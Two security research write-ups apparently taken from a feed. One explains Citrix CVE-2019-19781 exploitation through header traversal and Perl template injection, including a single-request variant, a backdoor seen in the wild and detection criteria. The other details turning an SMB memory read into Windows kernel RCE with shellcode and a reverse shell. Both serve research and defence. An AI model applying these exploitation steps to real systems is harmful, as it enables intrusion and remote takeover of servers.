So filewrite can be tricked into writing an XML file to an arbitrary location via a directory traversal in the HTTP header, but how do we trigger a call to filewrite, and how do we control the contents?

Well, as UserPrefs is a Perl module we cannot simply execute it directly via the URL traversal. Instead we need to find and invoke a Perl script, which makes use of the vulnerable functionality. For that we need to find a Perl file which:

  1. Is invokable as an unauthenticated user (i.e. contained in the `/vpns/portal/scripts` directory)
  2. Calls both `csd` and `filewrite` from the `` module

As discussed in many blog posts and tweets, as well as used in a number of public exploits, the script fits this requirement.

First it instantiates a UserPrefs object (called $user), before calling the csd function on the $user object (remember, this allows us to control the filename via the NSC_USER header). It subsequently accepts some data provided by the user in the request, including a url, title and desc parameter. These parameters are set as instance variables of the $doc object and passed to the filewrite function, where the data is serialised to an XML file on disk. This means that we can now control the path of where the XML file is written, as well as some limited content, via the name, url or desc parameters.

Call to csd function:

Call to csd Function

User supplied data added to $newBM variable:

User-controlled Values

User controlled properties assigned to $doc before calling filewrite:

Values Passed to filewrite Function

Now we have a semi-controlled file-write where we can write an XML file anywhere on disk and control some of the content, however we need a way to leverage this to achieve code execution. This is where the Template Toolkit component comes into play.

Perl Code Execution

When a request is received by the Citrix server, the request is handled according to the Apache httpd.conf configuration, which contains a large number of complex redirect rules which ship off the request to a particular component depending on the request properties, such as the request path. Requests to the /vpns/portal/ path are handled by the Perl module via the PerlResponseHandler mod_perl directive in the httpd.conf file.


Among other things (which we will explain later, or maybe some eagle-eyed readers may spot it in the screenshot), the Handler module simply takes the path specified within the request, forms a path to the requested file, and renders it via the Template Toolkit template engine.

Handler Function

This means that if we write our XML file to the templates directory, and inject template directives via the url, title or desc parameters, we can later cause the XML file to be rendered as a template using a follow-up HTTP request. Perfect!

However, there is one last hurdle. Although the Template Toolkit can allow code execution via template directives such as PERL and RAWPERL, these are disabled in the configuration used on the Citrix server. However, it was discovered that this same functionality could be achieved by abusing the global template object, which is exposed to all templates, to create a new BLOCK containing arbitrary Perl code, via a call to the method. This allows the attacker to execute their code using a template directive such as the following:

[%{ 'BLOCK' => 'print STDERR "ace.\n"; die' }) %]

Further details regarding this “feature” can be found in the GitHub issue.

Note that @0x09AL also identified another method to execute code via the DATAFILE plugin. This is also explained in the MDSec blog post.



Exploit Summary

So putting it all together, we need to:

  1. Make a request to the pl file with a directory traversal within the `NSC_USER` header, causing an XML file to be written to the templates directory.
  2. Inject a template directive into the dropped XML file, containing Perl code to be executed
  3. Make another request to the `/vpns/portal/<file>.xml` file in order to cause to render it via the template engine.

The above steps are the same as those carried out in the “Project Zero India” public exploit as well as the one subsequently released by TrustedSec shortly afterwards. It was also the same technique we and others had used in their own exploits. This resulted in some people (us included) believing that the following constraints could be relied upon for detection:

  1. The attacker must make two requests. First a POST request to write the XML file. Second, a GET request to render the XML file.
  2. The first request would be to the `` file
  3. The first request would contain an `NSC_USER` header containing a traversal string

Flawed Assumptions

Two days after the public exploits were released, @mpgn_x64 discovered that in fact any Perl file which called the csd function could be exploited, regardless of whether user-provided data was added to the written XML file.

@mpgn_x64 Tweet
Example using (Step 1)
Example using (Step 2)


This is possible because when the csd function is called, it eventually calls filewrite if the file does not already exist. This can be seen within the file. When csd is called, it internally calls fileread on line 61:

Call to fileread Function

The fileread function checks if the specified file (constructed via $username value, taken from the NSC_USER header), exists or not.

User-controlled Values in fileread

If the file does not exist, then the initdoc function is called, which creates the XML file passing the $username value:

initdoc Function

Additionally, aside from the user controlled values (such as url, title, and desc used in, the filewrite function would also write the username within the XML file, which as we showed before, is controlled via the NSC_USER header. So, if we request a “vulnerable” .pl file with an NSC_USER value that contains the target XML file to be written, but also a template injection string we can exploit the issue without controlling any other values in the XML file!

After this we simply need to request the XML file, causing it to be rendered via the template engine, ensuring that we encode any non-URL safe characters within the template/path appropriately.

This dispelled the first myth – exploitation could in fact take place against any .pl file calling the csd function. This included the following files:


Exploitation of this Method in the Wild

Shortly after this information was published, we started to see the first usage of this new exploitation technique deployed in the wild. This log extract shows some hits that were received in our Citrix honeypots, mostly from TOR exit nodes, starting from January 24th. Interestingly, these requests would write out a Perl backdoor line by line to a file named /netscaler/portal/scripts/ This backdoor simply checked if the MD5 hash of the supplied password parameter matched a hardcoded value, and if so, would execute the command provided within the HTTP request.

The decoded webshell code is shown below. This appears to be a modified version of the PerlKit webshell. this gist on GitHub

The details of this webshell were shared with our contacts at FireEye, who added detection to their IOC scanner script. Later the same month, further attacks were observed in the wild, distributing the same backdoor, in what appeared to be large distribution, non-targeted attacks. Just like with the Iran Network Team attacks, we are unable to provide any specific attribution due to limited visibility of post-exploitation activity.

Some more Quirks

To compound matters further, @superevr discovered that due to the way that the Citrix HTTP server handles requests, the exploit does not require a POST request followed by a GET request, and could be exploited with varying request methods. In fact the request method itself did not matter at all, and could be exploited even with a non-existent request method. The HTTP version number itself could also be meddled with, further frustrating efforts to detect exploitation attempts. Thanks to efforts by both the community and FireEye, detection methods were improved to take account for these “quirks”.

Refining the Exploit Further

Now we know that exploitation of this issue was not simply confined to one specific “vulnerable” .pl file, and that attackers are constantly evolving their attack techniques in order to overcome our assumptions of constraints of specific vulnerability exploitation, i.e. “how a well-behaving HTTP server should work. What other assumptions can we challenge? Well, in the next section we will show how we discovered that the issue can in fact be exploited:

  • With only a single HTTP Request
  • Without any “vulnerable” Perl file existing on the server
  • With only non-Perl files (.e.g. ping.html)
  • Without any existing file at all

In fact, this method can be used to exploit a vulnerable server even if an attacker has deleted all of the Perl files contained within the “scripts” directory – thus bypassing any “palware” patch that involves removing the vulnerable Perl scripts from the server. And best of all, the “exploit” fits in fewer than 280 characters.

To explain how this works, we need to take a step back and remember how the (and similar) exploits worked. You will recall that they all rely on the csd and filewrite functions being called, hence the need for a “vulnerable” .pl file. However, the csd function is also called outside of these Perl files.

If we take a look again at the module we can see that the csd function is actually called automatically whenever the Handler is invoked, which includes any time a file is served via the /portal/templates/* path. This means that whenever a request is made for a file within the templates directory (via a request to /vpns/portal/&lt;file&gt; which maps via the httpd.conf to the templates directory), the vulnerable code-path will be hit automatically, even if the requested file is an HTML or XML file, for example. The following screenshot highlights where the csd function is called within

As demonstrated by @mpgn_x64, all that is required for the exploit to succeed is a single call to the csd function (which itself calls filewrite), where we place both a template injection and directory traversal within the NSC_USER header. Therefore, putting this together, we can hit the vulnerable code without using any of the built-in Perl scripts. Requesting an existing file such as /vpns/portal/ping.html with a crafted NSC_USER header is enough to cause the XML file to be written to disk. An example request is shown below:

Dropping XML Payload with ping.html

Once the XML file has been written, we can then follow up with a request for the XML file, resulting in our code being executed:

Triggering Code Execution

So now we can exploit the issue without any vulnerable Perl file existing on the target server! But can we do better? Can the issue be exploited with only a single HTTP request to a non-existent file? Let’s take another look at the module.

On line 19, the csd function is called. As discussed, this causes our target XML file to be written to the templates directory:

Call to csd Function

Afterwards, on line 32 the requested file is rendered as a template:

Template Rendering

This means that our XML file is written just before the requested file is rendered. What if we craft a HTTP request that both writes and requests our XML file? The following screenshot shows how this works. First we send our crafted NSC_USER header, whilst also requesting the same file within the GET request path. This results in the XML file being first written, and then rendered straight afterwards, leading to code execution in a single HTTP request, without any vulnerable Perl file!

Successful Exploitation with Single Request

Note that aside from bypassing adversary patches that delete the “vulnerable” Perl files such as from the server, this method will also bypass the NOTROBIN method of checking for (and deleting) XML files within the template directory. This is due to a race-condition in that our XML file is written and rendered within the same request, and thus executed before it can be deleted.

Some Final Questions

Now we’ve shown a new method to exploit the vulnerability, and how to bypass adversary patches. However, we still have some other questions to answer.

Does the Citrix/FireEye IOC scanner detect this method?

Yes, it does. This is because their success_regexes[0] regex takes care of detecting any request (regardless of HTTP request method or version) that requests a file ending with .xml, which is a constraint of the vulnerability, and something which we cannot, as an attacker, control. The script additionally looks for responses with a 304 status code, which addresses a simple bypass technique of specifying an If-None-Match: * header to solicit a 304 instead of 200 status code.

Successful Detection via Regex

Furthermore, unless the attacker deletes the dropped .xml and compiled .ttc2 files, these will also be present on the filesystem and detectable via the IOC checker script. The following screenshot shows the Citrix/FireEye IOC scanner detecting exploitation via this technique:

IOC Scanner Detection

Readers may have read in FireEye’s “404 Exploit Not Found” blog post that the attacker behind the NOTROBIN attacks also used a single HTTP request method to exploit the issue. Our understanding is that this is not the same technique. The reason for this is that FireEye describes the attacker requesting Perl script via a POST request, resulting in a 304 response (presumably using the If-None-Match/If-Modified-Since trick). Discounting the fact that the request method can be arbitrary, our method does not make use of the file.

FireEye “404 Exploit Not Found” Blog

How can the single request exploit be detected?

As demonstrated above, the Citrix/FireEye IOC scanner still detects the single request variant from an endpoint perspective. Looking at the constraints of this new exploitation method, plus everything we have learned about obfuscation of request methods etc., we know that the request must:

  1. Contain `/vpns/portal/` within the path of the request
  2. Contain an `NSC_USER` header with a traversal `../` sequence
  3. End with `.xml`

However may:

  1. Be any request method type (e.g. `GET`, `HEAD`, `PUT`, `FOO`, `BAR`)
  2. Be split into multiple requests, e.g. one request to trigger the XML file drop, another to the XML (similar to the original exploit)
  3. Result in a 200 response, but could also result in a 304
  4. Contain a traversal `../` sequence in the request path – this depends on whether the request is made to the management or virtual IP interface

Finally, another question you may be wondering – perhaps you are worried that you applied the Citrix mitigation too late, and that an attacker may have “adversary patched” your Citrix server for you. Of course, in this scenario, the best course of action is to complete an examination of the server to identify any potential backdoors or attacker-deployed patches. For this, we thoroughly recommend the official IOC script provided by Citrix/FireEye. However, given that logs typically only persist for a couple of days, and that sophisticated actors may remove logs, it can be difficult to ascertain the level of intrusion by only looking at the Citrix device itself. If your device was patched after public exploits were released, it is highly likely that the device was compromised.



Latest Statistics

Here are the latest statistics based on the latest available data (as of June 2020):



Patched (but backdoored) vs. Unpatched (but backdoored)
  • 8115 servers were identified that are still vulnerable to CVE-2019-19781
  • Of the 8115 vulnerable servers, 2508 (30.9%) have indicators of adversary patching
    • These 2508 servers remain vulnerable due to the new discovery of the exploit method described in this blog
  • A total of 3,332 unique servers were identified to contain known indicators of compromise
  • 23% of the compromised servers had been officially patched, but were still backdoored
  • Many hosts contained multiple indicators and backdoors from distinct actors, in some cases up to 5 different indicators were observed
  • 49% of compromised devices were located in the US



Breakdown by Country

It has been just over six months since CVE-2019-119781 was first announced, and a mitigation made available. Yet the number of vulnerable and compromised found in the data based on in-the-wild hosts, is shockingly high. Furthermore, whilst we have been able to identify a subset of compromised devices, the true number is likely much higher. This is due to a number of reasons. Firstly, we were only able to observe a limited number of known IoCs, not all of which can be observed based on the datasets we have access to. Secondly the majority of the backdoors and webshells we’ve seen deployed still operate perfectly fine even after the server has been patched. These backdoors typically require no authentication or use a hardcoded password – meaning that anyone could use them as a method to gain remote access. We just don’t have a way of identifying the true number of patched-but-backdoored devices out there. Therefore, we believe that our statistics represent just the tip of the iceberg.

It can no longer be assumed that just because a device was patched, that it does not remain compromised. Nor can it be assumed that if a device was compromised and “patched” by one attacker, that it cannot be compromised by another attacker using the technique described in this publication. Not all attackers share the same motives. Whilst the MO of attackers deploying adversary patching might simply be to “hoard” access until later, other attackers may have more insidious, immediate motives, such as financial gain through ransomware. The most likely reason we haven’t seen many more backdoors deployed in the wild is due to adversary patching. However, as we have demonstrated – this provides both a false sense of security and obscures the true number of compromised devices that may be out there.

We hope that this publication helps to highlight the issue and provide additional visibility into techniques being used in the wild, as well as dispelling a few misconceptions about the vulnerability itself and demonstrates more robust ways to detect exploit variants. We urge organizations to ensure that their devices are not only patched, but that care is taken to ensure that latent compromises have been identified and remediated.

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

28 June 2020 at 08:41
SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE


Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has less limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.

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SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
/*00*/  (orange) LIST_ENTRY ConnectionBufferList;
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  (blue) PBYTE UserBufferPtr;
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  (blue) PBYTE PoolAllocationPtr;
/*38*/  (blue) PMDL pMdl1;
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  (blue) PMDL pMdl2;
/*58*/  (orange) PVOID pSrvNetWskStruct;
/*60*/  DWORD SmbFlags;
/*64*/  (orange) PVOID TracingPtr1;
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  (orange) PVOID TracingPtr2;
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
#pragma pack(pop)

The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can override those pointers in SRVNET_RECT, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');

Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECT struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC and such fix was left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECT struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though a 8-arguments function is intended to be called, we can replace the pointer with a function that expects any other amount of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECT struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECT struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECT struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECT struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version R5 and newer. Since Windows 10 version R5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor Incoming packets handled
Logical processor 1 0.2%
Logical processor 2 0.8%
Logical processor 3 7.9%
Logical processor 4 91.1%

Here’s the distribution of handling the decompression:

Logical processor Decompressions executed
Logical processor 1 13.3%
Logical processor 2 5.1%
Logical processor 3 6.8%
Logical processor 4 74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

